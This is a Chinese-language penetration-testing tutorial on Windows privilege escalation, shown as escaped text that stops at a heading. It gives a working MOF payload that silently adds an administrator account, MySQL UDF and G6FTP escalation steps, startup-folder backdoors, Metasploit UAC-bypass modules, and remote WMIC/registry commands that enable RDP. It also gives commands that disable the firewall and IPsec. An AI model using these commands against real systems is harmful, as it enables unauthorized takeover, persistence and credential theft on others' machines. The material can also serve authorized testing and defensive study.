          \u5728mysql \u53ef\u4ee5\u4f7f\u7528\u81ea\u5b9a\u4e49\u51fd\u6570\u8fdb\u884c\u63d0\u6743\uff0cudf = user defined function \u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u5bf9\u4e8e\u81ea\u5b9a\u4e49\u7684\u51fd\u6570 \u5728mysql5.1\u7248\u672c\u4ee5\u540e\u5c31\u9700\u8981\u653e\u5728\u63d2\u4ef6\u63d2\u4ef6\u76ee\u5f55 \/lib\/plugin ,\u6587\u4ef6\u540e\u7f00\u5faedll\uff0cc\u8bed\u8a00\u7f16\u5199<\/p>\n
          \u63d2\u4ef6\u76ee\u5f55<\/strong><\/p>\n
          \u53ef\u4ee5\u4f7f\u7528\u8bed\u53e5\u67e5\u8be2plugin\u63d2\u4ef6\u76ee\u5f55<\/p>\n
          show variables like "%plugin%"<\/p>\n
          \"1746602174597-3b1cc0ff-4ae1-495f-a688-4a240eff21ae.png\"<\/p>\n
          \u590d\u73b0<\/strong><\/p>\n
          \u5728\u7f51\u7ad9\u4e0a\u5bfb\u627emysql\u670d\u52a1\u7684\u8fde\u63a5\u8d26\u53f7\u548c\u5bc6\u7801<\/p>\n
          \u4e0a\u4f20\u63d0\u6743\u811a\u672c \u5230\u7f51\u7ad9\u76ee\u5f55<\/p>\n
          \"1746602186166-1766b956-5fa2-4f07-8114-a01e7460a733.png\"<\/p>\n
          \u586b\u5199mysql\u7684\u8d26\u53f7\u548c\u5bc6\u7801\u540e \u5bfc\u51faudf<\/p>\n
          \"1746602199829-3627ab6a-d645-488a-9ca1-6131713c4697.png\"\"1746602208805-bf0fd6f0-18d3-41a9-ae30-49f265f7ebea.png\"<\/p>\n
          \u521b\u5efaudf\u51fd\u6570<\/p>\n
          \"1746602227866-61c1730d-1d31-4653-9996-1c2cf48bbdfd.png\"<\/p>\n
          mysql\u63d0\u6743\u95ee\u9898<\/h3>\n
          1.\u7248\u672c\u670932 \u548c64\u4f4d\u7684mysql \u521b\u5efa\u51fd\u6570\u7684\u65b9\u6cd5\u4e00\u6837\uff0c\u4f46\u662f64\u7248\u672c\u7684\u8981\u752864\u7684udf.dll<\/p>\n
          2.The MySQL server is running with the \u2013secure-file-priv option so it cannot execute this statement<\/p>\n
          \u8fd9\u79cd\u662fmysql\u9ed8\u8ba4\u8bbe\u7f6e\u662f\u4e0d\u5141\u8bb8\u5bfc\u5165\u5bfc\u51fa \u9700\u8981\u5728my.ini\u6dfb\u52a0 secure-file-priv = \u4fdd\u5b58\u91cd\u542fmysql\u5373\u53ef<\/p>\n
          SELECT @@global.secure_file_priv<\/p>\n
          3.Can\u2019t create\/write to file \u2018D:phpStudyMySQLlibpluginmoonudf.dll<\/p>\n
          \u8fd9\u79cd\u662f\u6ca1\u6709\u6743\u9650\u5bfc\u51fa\u6216\u8005plugin\u76ee\u5f55\u4e0d\u5b58\u5728\uff0c\u9700\u8981\u624b\u52a8\u521b\u5efa\u6216\u8005\u6743\u9650\u4e0d\u591f<\/p>\n
          mof\u63d0\u6743<\/h3>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          \u6258\u7ba1\u5bf9\u8c61\u683c\u5f0f (MOF) \u6587\u4ef6\u662f\u521b\u5efa\u548c\u6ce8\u518c\u63d0\u4f9b\u7a0b\u5e8f\u3001\u4e8b\u4ef6\u7c7b\u522b\u548c\u4e8b\u4ef6\u7684\u7b80\u4fbf\u65b9\u6cd5\u3002\u5728 MOF \u6587\u4ef6\u4e2d\u521b\u5efa\u7c7b\u5b9e\u4f8b\u548c\u7c7b\u5b9a\u4e49\u540e\uff0c\u53ef\u4ee5\u5bf9\u8be5\u6587\u4ef6\u8fdb\u884c\u7f16\u8bd1\u3002\u7f16\u8bd1 MOF \u6587\u4ef6\u5c06\u5728 CIM \u50a8\u5b58\u5e93\u4e2d\u6ce8\u518c\u6240\u6709\u7684\u7c7b\u5b9a\u4e49\u548c\u5b9e\u4f8b\u3002\u4e4b\u540e\uff0c\u63d0\u4f9b\u7a0b\u5e8f\u3001\u4e8b\u4ef6\u7c7b\u522b\u548c\u4e8b\u4ef6\u4fe1\u606f \u4fbf\u53ef\u7531 WMI \u548c Visual Studio Analyzer \u4f7f\u7528\u3002 \u5728 MOF \u6587\u4ef6\u4e2d\u521b\u5efa\u63d0\u4f9b\u7a0b\u5e8f\u3001\u4e8b\u4ef6\u7c7b\u522b\u548c\u4e8b\u4ef6\u7c7b\u7684\u5b9e\u4f8b\uff0c\u5e76\u4e14\u5b9a\u4e49\u60f3\u8981\u5206\u6790\u7684\u81ea\u5b9a\u4e49\u5bf9\u8c61\uff0c\u4e4b\u540e\uff0c\u5c31\u53ef\u4ee5\u5bf9\u8be5\u6587\u4ef6\u8fdb\u884c\u7f16\u8bd1<\/p>\n
          \u539f\u7406<\/strong><\/p>\n
          mof\u662fwindows\u7cfb\u7edf\u7684\u4e00\u4e2a\u6587\u4ef6\uff08\u5728c:\/windows\/system32\/wbem\/mof\/nullevt.mof\uff09\u53eb\u505a"\u6258\u7ba1\u5bf9\u8c61\u683c<\/p>\n
          \u5f0f"\u5176\u4f5c\u7528\u662f\u6bcf\u9694\u4e94\u79d2\u5c31\u4f1a\u53bb\u76d1\u63a7\u8fdb\u7a0b\u521b\u5efa\u548c\u6b7b\u4ea1\u3002\u5176\u5c31\u662f\u7528\u53c8\u4e86mysql\u7684root\u6743\u9650\u4e86\u4ee5\u540e\uff0c\u7136\u540e\u4f7f\u7528root\u6743\u9650\u53bb\u6267\u884c\u6211\u4eec\u4e0a\u4f20\u7684mof\u3002\u9694\u4e86\u4e00\u5b9a\u65f6\u95f4\u4ee5\u540e\u8fd9\u4e2amof\u5c31\u4f1a\u88ab\u6267\u884c\uff0c\u8fd9\u4e2amof\u5f53\u4e2d\u6709\u4e00\u6bb5\u662fvbs\u811a\u672c\uff0c\u8fd9\u4e2avbs\u5927\u591a\u6570\u7684\u662fcmd\u7684\u6dfb\u52a0\u7ba1\u7406\u5458\u7528\u6237\u7684\u547d\u4ee4<\/p>\n
          \u5f71\u54cd\u7248\u672c<\/strong><\/p>\n
          1.windows 03\u53ca\u4ee5\u4e0b\u7248\u672c<\/p>\n
          2.mysql\u542f\u52a8\u8eab\u4efd\u5177\u6709\u6743\u9650\u53bb\u8bfb\u5199c:\/windows\/system32\/wbem\/mof\u76ee\u5f55<\/p>\n
          3.secure-file-priv\u53c2\u6570\u4e0d\u4e3anull<\/p>\n
          \u590d\u73b0<\/strong><\/p>\n
          \u516c\u5f00\u7684nullevt.mof\u5229\u7528\u4ee3\u7801<\/p>\n
          #pragma namespace(\"\\\\.\\root\\subscription\")\ninstance of __EventFilter as $EventFilter\n{\nEventNamespace = \"Root\\Cimv2\";\nName = \"filtP2\";\nQuery = \"Select * From __InstanceModificationEvent \"\n\"Where TargetInstance Isa \"Win32_LocalTime\" \"\n\"And TargetInstance.Second = 5\";\nQueryLanguage = \"WQL\";\n};\ninstance of ActiveScriptEventConsumer as $Consumer\n{\nName = \"consPCSV2\";\nScriptingEngine = \"JScript\";\nScriptText =\n\"var WSH = new ActiveXObject(\"WScript.Shell\")nWSH.run(\"net.exe user\nmoonteam$ xxx12456 \/add && net localgroup administrators moonteam$ \/add\")\";\n};\ninstance of __FilterToConsumerBinding\n{\nConsumer = $Consumer;\nFilter = $EventFilter;\n};<\/code><\/pre>\n
          \u628amof.php\u4e0a\u4f20\u5230\u811a\u672c \u586b\u5199\u547d\u4ee4\u5bfc\u51fa\u5373\u53ef<\/p>\n
          \"1746602369128-ddf091cb-c843-4d11-a207-f35dba0eb130.png\"<\/p>\n
          G6FTP \u63d0\u6743<\/h3>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          G6 FTP Server \u65b0\u4e00\u4ee3\u7684 FTP \u670d\u52a1\u5668\u7aef\u8f6f\u4ef6\uff0c\u652f\u6301 RFC-959 \u6807\u51c6\u5e76\u589e\u5f3a\u5176\u4e2d\u7684\u67d0\u4e9b\u529f\u80fd\uff0c\u4e0a\u4f20\u548c\u4e0b\u8f7d\u90fd\u53ef\u4ee5\u7eed\u4f20\uff0c\u5b9e\u65f6\u67e5\u770b\u8fd0\u884c\u72b6\u6001\uff0c\u5360\u7528\u5e26\u5bbd\uff0c\u8fd8\u6709\u5f88\u591a\u529f\u80fd\u3002<\/p>\n
          \u539f\u7406<\/strong><\/p>\n
          G6FTP\u7684\u9ed8\u8ba4\u7aef\u53e3\u4e3a8021\uff0c\u53ea\u4fa6\u542c\u5728127.0.0.1\u76848021\u7aef\u53e3\u4e0a\uff0c\u6240\u4ee5\u65e0\u6cd5\u4ece\u5916\u90e8\u76f4\u63a5\u8bbf\u95ee\uff0c\u9700\u8981\u8fdb\u884c\u7aef\u53e3\u8f6c\u53d1\uff08\u4f7f\u7528lcx \u5de5\u5177\uff08lcx \u5177\u6709\u4e09\u4e2a\u529f\u80fd\uff1a\u76d1\u542c\u3001\u8f6c\u53d1\u3001\u7aef\u53e3\u8f6c\u5411\uff09\uff09<\/p>\n
          netstat -ano \u67e5\u770bG6fp\u7aef\u53e3<\/p>\n
          \"1746602399173-6beb1a9c-20c1-4594-b25b-11c8bb8d1dca.png\"<\/p>\n
          \u590d\u73b0<\/strong><\/p>\n
          \u5728webshell\u8bbf\u95ee \u914d\u7f6e\u6587\u4ef6 C:Program Files (x86)Gene6 FTP ServerRemoteAdminRemote.ini<\/p>\n
          \"1746602414474-77b6787d-2f33-46b3-9d1c-2c3fdd5fc390.png\"<\/p>\n
          cmd5\u7834\u89e3<\/p>\n
          \"1746602427156-39d7e92e-13e7-4957-ac57-962d1ec9b6e1.png\"<\/p>\n
          \u4f7f\u7528\u7aef\u53e3\u8f6c\u53d1\u5de5\u5177\u628a8021\u7aef\u53e3\u8f6c\u53d1\u51fa\u6765 lcx.exe -tran 2333 127.0.0.1 8021<\/p>\n
          \"1746602436431-a53d5f98-73b4-4637-a755-f989875e0a64.png\"<\/p>\n
          \u5728\u653b\u51fb\u8005\u4e0a\u5b89\u88c5g6ftp \u8fde\u63a5\u4e0a\u670d\u52a1\u7aef\u8fdb\u884c\u8bbe\u7f6e<\/p>\n
          \"1746602929726-e9368bd9-186a-4802-96eb-f11009664302.png\"<\/p>\n
          \"1746602933745-b574e38d-5f3a-4651-8ff3-b5b5c61d4da8.png\"<\/p>\n
          \u5c06\u4ee5\u4e0b\u6dfb\u52a0\u7ba1\u7406\u5458\u547d\u4ee4 \u4fdd\u5b58\u4e3abat\u6587\u4ef6\u4e0a\u4f20\u5230\u76ee\u6807\u4e0a \u5728\u8bbe\u7f6e\u91cc\u9009\u62e9\u6267\u884c<\/p>\n
          net user moon QWEasd123 \/add && net localgroup administrators moon \/add<\/p>\n
          \"1746602945886-034465c4-c147-42f7-bfe9-6f791d5c7974.png\"\u767b\u5f55ftp\u6267\u884c quote stie A \u4f46\u662f\u5931\u8d25\u4e86 \u5728<\/p>\n
          \"1746602955004-e5997529-c3b0-445a-9916-28d9c48fc5e9.png\"<\/p>\n
          \u4e0a\u4f20 Program.exe \u7cfb\u7edf\u91cd\u542f\u65f6\u4f1a\u81ea\u52a8\u6267\u884c<\/p>\n
          \"1746602964434-8052a024-66b6-4291-a02a-923dfb2c90c4.png\"<\/p>\n
          \"1746602972750-9c561480-66bd-4cc8-a850-bcc4634f2fc8.png\"<\/p>\n
          ftp:\/\/192.168.0.108\/Users\/Administrator\/AppData\/Roaming\/Microsoft\/Windows\/Start%20Menu\/Programs\/Startup\/<\/p>\n
          \u5199\u5230\u542f\u52a8\u9879\u6267\u884c\u540e\u95e8<\/p>\n
          \u7ed5\u8fc7uac bypassuac<\/h2>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          UAC\uff08UserAccount Control\uff0c\u7528\u6237\u8d26\u6237\u63a7\u5236\uff09\u7b80\u8a00\u4e4b\u5c31\u662f\u5728Vista\u53ca\u66f4\u9ad8\u7248\u672c\u4e2d\u901a\u8fc7\u5f39\u6846\u8fdb\u4e00\u6b65\u8ba9\u7528\u6237\u786e\u8ba4\u662f\u5426\u6388\u6743\u5f53\u524d\u53ef\u6267\u884c\u6587\u4ef6\u6765\u8fbe\u5230\u963b\u6b62\u6076\u610f\u7a0b\u5e8f\u7684\u76ee\u7684<\/p>\n
          \"1746603031328-41f505f0-24a2-467b-951f-5c7c7f07cf42.png\"<\/p>\n
          \u4e3a\u4e86\u8fdc\u7a0b\u6267\u884c\u76ee\u6807\u7684exe\u6216\u8005bat\u53ef\u6267\u884c\u6587\u4ef6\u7ed5\u8fc7\u6b64\u5b89\u5168\u673a\u5236\uff0c\u4ee5\u6b64\u53ebBypassUAC\uff08\u4e0d\u8fdb\u884c\u5f39\u7a97\u76f4\u63a5\u8fd0\u884c\u6267\u884c\u6587\u4ef6\uff09<\/p>\n
          \u590d\u73b0<\/strong><\/p>\n
          bypassuac\u6a21\u5757\u7ed5\u8fc7uac<\/p>\n
          \u4f7f\u7528msf\u641c\u7d22 uac\u6a21\u5757<\/p>\n
          \"1746603072634-28d4fee7-050d-4af7-8a89-4f3da370c4cd.png\"<\/p>\n
          \u901a\u5e38\u4f7f\u7528 bypassuac\u6a21\u5757 \u4e00\u822c\u662f\u53ef\u4ee5\u7ed5\u8fc7\u7684 \u4f46\u662f\u4e5f\u4e0d\u6392\u9664\u5931\u8d25\u7684\u53ef\u80fd<\/p>\n
          \u901a\u8fc7\u8fdb\u7a0b\u6ce8\u5165\u4f7f\u53ef\u4fe1\u4efb\u53d1\u5e03\u8005\u8bc1\u4e66\u7ed5\u8fc7Windows UAC<\/p>\n
          \"1746603086520-0b56c6a0-03b3-4126-882b-bb8a661f394b.png\"<\/p>\n
          use exploit\/windows\/local\/bypassuac<\/p>\n
          set session 1<\/p>\n
          run<\/p>\n
          \"1746603098539-480cd884-b48e-44c5-93fa-61c91a9e6cb8.png\"<\/p>\n
          \u5728\u8fd9\u91ccbypassuac\u5931\u8d25<\/p>\n
          \u4f7f\u7528bypassuac_injection\u6a21\u5757\u8fdb\u884cbypass<\/p>\n
          exploit\/windows\/local\/bypassuac_injection<\/p>\n
          \u63cf\u8ff0<\/p>\n
          \u6b64\u6a21\u5757\u5c06\u5229\u7528\u53d7\u4fe1\u4efb\u7684\u901a\u8fc7\u8fdb\u7a0b\u6ce8\u5165\u53d1\u5e03\u8005\u8bc1\u4e66\u3002\u5b83\u5c06\u4ea7\u751f\u4e00\u4e2a\u5173\u95edUAC\u6807\u5fd7\u7684\u7b2c\u4e8c\u4e2ashell\u3002\u6b64\u6a21\u5757\u4f7f\u7528\u53cd\u5c04DLL\u6ce8\u5165\u6280\u672f\uff0c\u4ec5\u4e22\u5f03DLL\u6709\u6548\u8d1f\u8f7d\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u800c\u4e0d\u662f\u6807\u51c6\u6280\u672f\u4e2d\u7684\u4e09\u4e2a\u5355\u72ec\u7684\u4e8c\u8fdb\u5236\u6587\u4ef6\u3002\u4f46\u662f\uff0c\u5b83\u9700\u8981\u9009\u62e9\u6b63\u786e\u7684\u4f53\u7cfb\u7ed3\u6784x64\uff08\u4e5f\u9002\u7528\u4e8eSYSWOW64\u7cfb\u7edf\uff09\u3002\u5982\u679c\u6307\u5b9aEXE:\uff1a\u81ea\u5b9a\u4e49DLL\u5e94\u5728\u5355\u72ec\u542f\u52a8\u6709\u6548\u8d1f\u8f7d\u540e\u8c03\u7528ExitProcess\uff08\uff09<\/p>\n
          \u8fc7\u7a0b<\/p>\n
          use exploit\/windows\/local\/bypassuac_injection<\/p>\n
          set session 1<\/p>\n
          run<\/p>\n
          \"1746603140409-86d87333-66be-499a-a055-b64430007f5d.png\"<\/p>\n
          \u5982\u679c\u4f7f\u7528hashdump\u51fa\u73b0\u8fd9\u4e9b\u9519\u8bef\u4fe1\u606f<\/p>\n
          [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.\n[!] Meterpreter scripts are deprecated. Try post\/windows\/gather\/smart_hashdump.\n[!] Example: run post\/windows\/gather\/smart_hashdump OPTION=value [...]\n[*] Obtaining the boot key...\n[*] Calculating the hboot key using SYSKEY 9d0056b2b80f84cdc01549df87d34515...\n[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError\nstdapi_registry_open_key: Operation failed: Access is denied.\n[-] This script requires the use of a SYSTEM user context (hint: migrate into\nservice process)<\/code><\/pre>\n
          \"1746603159191-4c04da15-d534-4a93-9531-edd03584c136.png\"\u8fc1\u79fb\u8fdb\u884c\u523064\u8fdb\u7a0b\u5373\u53ef\u54c8\u5e0c\u3002\u8fd9\u4e2a\u54c8\u5e0c\u5f97\u4f5c\u7528 \u6211\u518d\u5185\u7f51\u6a2a\u884c\u7bc7\u91cc\u518d\u8ddf\u8be6\u7ec6\u8bf4<\/p>\n
          \"1746603169139-723d92e3-1408-4661-897a-5ac46d55c9a8.png\"<\/p>\n
          lcx\u7aef\u53e3\u8f6c\u53d1<\/h2>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          lcx\u662f\u4e00\u6b3e\u5f3a\u5927\u7684\u5185\u7f51\u7aef\u53e3\u8f6c\u53d1\u5de5\u5177\uff0c\u7528\u4e8e\u5c06\u5185\u7f51\u4e3b\u673a\u5f00\u653e\u7684\u5185\u90e8\u7aef\u53e3\u6620\u5c04\u5230\u5916\u7f51\u4e3b\u673a\uff08\u6709\u516c\u7f51IP\uff09\u4efb\u610f\u7aef\u53e3\u3002\u5b83\u662f\u4e00\u6b3e\u547d\u4ee4\u884c\u5de5\u5177\uff0c\u5f53\u7136\u4e5f\u53ef\u4ee5\u5728\u6709\u6743\u9650\u7684webshell\u4e0b\u6267\u884c\uff0c\u6b63\u56e0\u5982\u6b64lcx\u5e38\u88ab\u8ba4\u4e3a\u662f\u4e00\u6b3e\u9ed1\u5ba2\u5165\u4fb5\u5de5\u5177\uff0clcx\u5728\u5185\u7f51\u5165\u4fb5\u6e17\u900f\u4e2d\u8d77\u7740\u91cd\u8981\u7684\u89d2\u8272\u3002lcx\u8fdb\u884c\u7aef\u53e3\u8f6c\u53d1\u7684\u539f\u7406\u5c31\u662f\u4f7f\u4e0d\u540c\u7aef\u53e3\u4e4b\u95f4\u5f62\u6210\u4e00\u4e2a\u56de\u8def\u3002\u5b83\u5e38\u7528\u4e8e\u5916\u7f51\u8fde\u63a5\u5185\u7f513389\u7aef\u53e3<\/p>\n
          lcx\u547d\u4ee4<\/strong><\/p>\n
          [option:]\n-listen <ConnectPort> <TransmitPort>\n-tran <ConnectPort> <TransmitHost> <TransmitPort>\n-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort><\/code><\/pre>\n
          \u672c\u5730\u8f6c\u53d1<\/strong><\/p>\n
          \u672c\u5730\u8f6c\u53d1\u4e3b\u8981\u662f\u628a127.0.0.1:\u7aef\u53e3 \u8fd9\u4e2a\u672c\u5730\u7aef\u53e3 \u8f6c\u53d1\u5230\u5916\u90e8 \u8ba9\u5916\u90e8\u7684\u5ba2\u6237\u7aef\u5141\u8bb8\u8fde\u63a5\u8fdb\u6765\u4f8b\u5982\u60f3\u53d1mysql\u7aef\u53e3\u8f6c\u53d1\u51fa\u6765<\/p>\n
          \u5ba2\u6237\u7aef–>3307->127.0.0.1:3306<\/p>\n
          \"1746603223495-32ce3964-46a3-4717-b0b2-3f281d9a2a00.png\"<\/p>\n
          \"1746603228120-9e40352b-bde0-4088-8dd1-fe7e0b36842e.png\"<\/p>\n
          \u5728\u76ee\u6807\u4e0a\u6267\u884c lcx -tran 3307 127.0.0.1 3306<\/p>\n
          \"1746603238081-25d7ea55-b8b6-4a58-b7ad-0f76b73f967b.png\"<\/p>\n
          \u77e5\u9053mysql\u7684\u8d26\u53f7\u548c\u5bc6\u7801\u76f4\u63a5\u8fde\u63a5\u5373\u53ef\u3002 mysql -uroot -proot -h192.168.0.118 -P 3307<\/p>\n
          \"1746603246222-8afd7a01-ed9c-40e8-8000-1f15ae16c5d6.png\"<\/p>\n
          \u8fdc\u7a0b\u8f6c\u53d1<\/strong><\/p>\n
          \u8fdc\u7a0b\u8f6c\u53d1 \u4e00\u822c\u7528\u4e8e\u5916\u7f51\u65e0\u6cd5\u8bbf\u95ee\u5185\u7f51\uff0c\u5185\u7f51\u53ef\u4ee5\u8bbf\u95ee\u5916\u7f51\uff0c\u7531\u5185\u90e8\u53d1\u51fa\u8bf7\u6c42\u5230\u5916\u7f51\uff0c\u6240\u4ee5\u9632\u706b\u5899\u4e0d\u4f1a\u62e6\u622a\u3002<\/p>\n
          \u5ba2\u6237\u7aef\u9664\u4e86\u53ef\u4ee5\u5728\u672c\u5730\u8bbf\u95ee\u5185\u7f51\u673a\u5b50\uff0c\u4e5f\u53ef\u4ee5\u4f5c\u4e3a\u4e2d\u95f4\u4eba\uff0c\u5916\u90e8\u673a\u5b50\u4e5f\u80fd\u8fde\u63a5\u5ba2\u6237\u7aef\u5230\u5185\u7f51\u670d\u52a1\u7aef<\/p>\n
          \"1746603270590-07e8d0d5-9ef8-4b6f-a2d9-927a99bb5ede.png\"<\/p>\n
          \u670d\u52a1\u7aef\u6267\u884c lcx.exe -slave 192.168.0.146 2333 127.0.0.1 3389<\/p>\n
          \u5ba2\u6237\u7aef\u6267\u884c lcx -listen 51 2333<\/p>\n
          \u5ba2\u6237\u7aef\u4f7f\u7528\u8fdc\u7a0b\u7ec8\u7aef \u8fde\u63a5\u672c\u5730 127.0.0.1:51\u5373\u767b\u5f553389\u7aef\u53e3\u7684\u8fdc\u7a0b\u7ec8\u7aef<\/p>\n
          \"1746603281307-27843fef-6dac-4637-8d6e-0863ddb2d0dd.png\"<\/p>\n
          \u653b\u51fb\u8005\u8fde\u63a5\u5ba2\u6237\u7aef\u518d\u5230\u670d\u52a1\u7aef<\/p>\n
          \"1746603290825-c280a98a-952d-4812-bd7b-7c21bd0fa1ec.png\"<\/p>\n
          \u8fdc\u7a0b\u7ec8\u7aef\u95ee\u9898\u96c6\u9526<\/h2>\n
          \u63cf\u8ff0<\/strong><\/p>\n
          \u8fdc\u7a0b\u7ec8\u7aef\u7684\u9ed8\u8ba4\u7aef\u53e3\u662f3389 \u4e91vps\u4e00\u822c\u4f1a\u5f00\u542f \u6ca1\u6709\u542f\u7528\u7684\u60c5\u51b5\u4e0b\uff0c\u5728\u8f83\u9ad8\u7684\u6743\u9650\u4e0b\u53ef\u4ee5\u4f7f\u7528\u6ce8\u518c\u8868\u547d\u4ee4\u8fdb\u884c\u5f00\u542f<\/p>\n
          \"1746603306226-6da30cb9-42b9-432f-803d-494759f62162.png\"<\/p>\n
          \u6ce8\u518c\u8868\u5f00\u542f\u8fdc\u7a0b\u7ec8\u7aef\u547d\u4ee4<\/h3>\n
          2008 2012 2016 \u5f00\u542f3389<\/strong><\/p>\n
          echo DO ALL IN CMD!\nreg add \"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server\" \/v\nfDenyTSConnections \/t REG_DWORD \/d 0 \/f\nreg add \"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal\nServerWdsrdpwdTdstcp\" \/v PortNumber \/t REG_DWORD \/d 3389 \/f\nreg add \"HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal\nServerWinStationsRDP-Tcp\" \/v PortNumber \/t REG_DWORD \/d 3389 \/f<\/code><\/pre>\n
          MSF\u547d\u4ee4\u5f00\u542f3389\u7aef\u53e3<\/strong><\/p>\n
          run getgui -e<\/p>\n
          \u4e00\u6761\u547d\u4ee4\u5f00\u59cb3389<\/strong><\/p>\n
          REG ADD \"HKLMSYSTEMCurrentControlSetControlTerminal Server\" \/v\nfDenyTSConnections \/t REG_DWORD \/d 0 \/f<\/code><\/pre>\n
          WMIC\u547d\u4ee4\u5f00\u542f3389\u7aef\u53e3<\/strong><\/p>\n
          Win2k3\/Win7\/Win2k8\/Win8.1\/Win10\/2012\/2016(1\uff1aON\u30010\uff1aOFF)<\/p>\n
          \u524d\u63d0\u6761\u4ef6\u662f\u786e\u4fdd\u201cWindows Management Instrumentation(Winmgmt)\u201d\u670d\u52a1\u5df2\u6b63\u5e38\u542f\u52a8\u3002<\/p>\n
          wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1<\/code><\/pre>\n
          WMIC\u5f00\u542f\u8fdc\u7a0b\u4e3b\u673a3389\u7aef\u53e3<\/strong><\/p>\n
          \u652f\u6301\u7cfb\u7edf\uff1a<\/p>\n
          Win2k\/XP\/Win2k3<\/p>\n
          wmic \/node:192.168.0.103 \/user:administrator \/password:betasec PATH\nwin32_terminalservicesetting WHERE (__Class!=\"\") CALL SetAllowTSConnections 1<\/code><\/pre>\n
          \u652f\u6301\u7cfb\u7edf\uff1a<\/p>\n
          Win7\/Win2k8\/Win8.1\/Win10\/2012\/2016<\/p>\n
          wmic \/node:192.168.0.116 \/user:administrator \/password:betasec RDTOGGLE WHERE\nServerName='WIN-TO2CN3V2VPR' call SetAllowTSConnections 1\nwmic \/node:192.168.0.116 \/user:administrator \/password:betasec process call\ncreate 'cmd.exe \/c REG ADD \"HKLMSYSTEMCurrentControlSetControlTerminal\nServer\" \/v fDenyTSConnections \/t REG_DWORD \/d 0 \/f'<\/code><\/pre>\n
          \u6ce8\u610f\u4e8b\u9879\uff1a<\/p>\n
          \u5176\u5b9e\u5c31\u662f\u5229\u7528WMIC\u8fdc\u7a0b\u6267\u884c\u547d\u4ee4\u7684\u65b9\u5f0f\u6765\u6267\u884cWMIC\u3001REG\u7b49\u5f00\u542f3389\u7aef\u53e3\u7684\u547d\u4ee4\u3002WMIC\u8fdc\u7a0b\u5f00\u542f3389\u7aef\u53e3\u65f6\u4e0d\u80fd\u7528%COMPUTERNAME%\u73af\u5883\u53d8\u91cf\u66ff\u4ee3\u8fdc\u7a0b\u4e3b\u673a\u7684\u8ba1\u7b97\u673a\u540d\u3002<\/p>\n
          \u9519\u8bef\uff1a\u63cf\u8ff0 = \u62d2\u7edd\u8bbf\u95ee\uff0c\u8fd9\u662f\u56e0\u4e3a\u5f00\u542f\u4e86UAC\u7528\u6237\u8d26\u6237\u63a7\u5236\uff0c\u53ea\u5141\u8bb8RID500\u7ba1\u7406\u5458\u6267\u884c\u6b64\u64cd\u4f5c\u3002<\/p>\n
          \u67e5\u8be2\u662f\u5426\u5f00\u542f3389 \uff080\u4e3aOn 1\u4e3aOFF\uff09<\/h3>\n
          REG query \"HKLMSYSTEMCurrentControlSetControlTerminal Server\" \/v\nfDenyTSConnections<\/code><\/pre>\n
          \u6ce8\u518c\u8868\u67e5\u8be2\u7aef\u53e3\u53f7<\/h3>\n
          HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal\nServerWinStationsRDP-Tcp<\/code><\/pre>\n
          \u67e5\u770bPortNumber\u5b57\u6bb5<\/p>\n
          \"1746603480405-380d79c4-b79a-4cb9-8c92-8d9f3a65507b.png\"<\/p>\n
          REG query \"HKLMSYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTds\"\n\/s\nREG query \"HKLMSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-\nTcp\" \/v PortNumber\nset \/a Port=0xd3d<\/code><\/pre>\n
          \u901a\u8fc7\u7f51\u7edc\u547d\u4ee4\u67e5\u8be2\u7aef\u53e3<\/p>\n
          tasklist \/svc | findstr \"TermService\"\nnetstat -ano | findstr \"\u8fdb\u7a0b\u53f7\"\nnet start |find \"Remote Desktop Services\"<\/code><\/pre>\n
          \u5173\u95ed\u9632\u706b\u5899<\/h3>\n
          \u786e\u5b9a\u5f00\u542f\u4e86\u8fdc\u7a0b\u7ec8\u7aef\u5e76\u4e14\u7aef\u53e3\u6ca1\u9519\u7684\u60c5\u51b5\u4e0b \u8fd8\u662f\u8fde\u4e0d\u4e0a\u76ee\u6807 \u76ee\u6807\u4e0a\u7684\u9632\u706b\u5899\u53ef\u80fd\u5141\u8bb8\uff0c\u8fd9\u4e2a\u65f6\u5019\u53ef\u4ee5\u4f7f<\/p>\n
          \u7528lcx\u7aef\u53e3\u8f6c\u53d1\uff0c\u6216\u8005\u4f7f\u7528\u547d\u4ee4\u5173\u95ed\u9632\u706b\u5899<\/p>\n
          netsh advfirewall show allprofile state \u67e5\u8be2\u72b6\u6001\nnetsh advfirewall set allprofiles state off \u5173\u95ed\u9632\u706b\u5899\nnet stop \"Windows Firewall\" \u5173\u95ed\u9632\u706b\u5899\nsc config sharedaccess start= disabled \u7981\u7528\u9632\u706b\u5899\nnet stop sharedaccess \u5173\u95ed\u9632\u706b\u5899<\/code><\/pre>\n
          \u5173\u95ed ipsec<\/h3>\n
          \u5728\u5173\u95ed\u9632\u706b\u5899\u65f6\uff0c\u8fd8\u662f\u8fde\u63a5\u4e0d\u4e0a\uff0c\u53ef\u80fd\u662fipsec\u505a\u4e86ip\u7b56\u7565\u5904\u7406\uff0c\u5bfc\u81f4\u8fde\u63a5\u5931\u8d25<\/p>\n
          \u53ef\u4ee5\u4f7f\u7528\u547d\u4ee4 net stop "IPsec Policy Agent"<\/p>\n
          \u7ec8\u7aef\u8fde\u63a5\u9519\u8bef\u65b9\u6cd5<\/h3>\n
          \"1746603541335-bf22c687-e88b-4e25-867a-8df14a1a529e.png\"<\/h3>\n
          \u53ef\u4ee5\u4f7f\u7528\u76f8\u540c\u7248\u672c\u7684\u7ec8\u7aef\u8fdb\u884c\u8fde\u63a5<\/p>\n
          \u6216\u8005\u4f7f\u7528 xfreerdp\u8fde\u63a5\u4f1a\u81ea\u52a8\u52a0\u5bc6<\/p>\n
          sudo apt install freerdp2-x11\nxfreerdp \/f \/u:administrator \/p:123456 \/v:192.168.0.118<\/code><\/pre>\n
          \u52a0\u5165\u8fdc\u7a0b\u684c\u9762\u7ec4<\/h3>\n
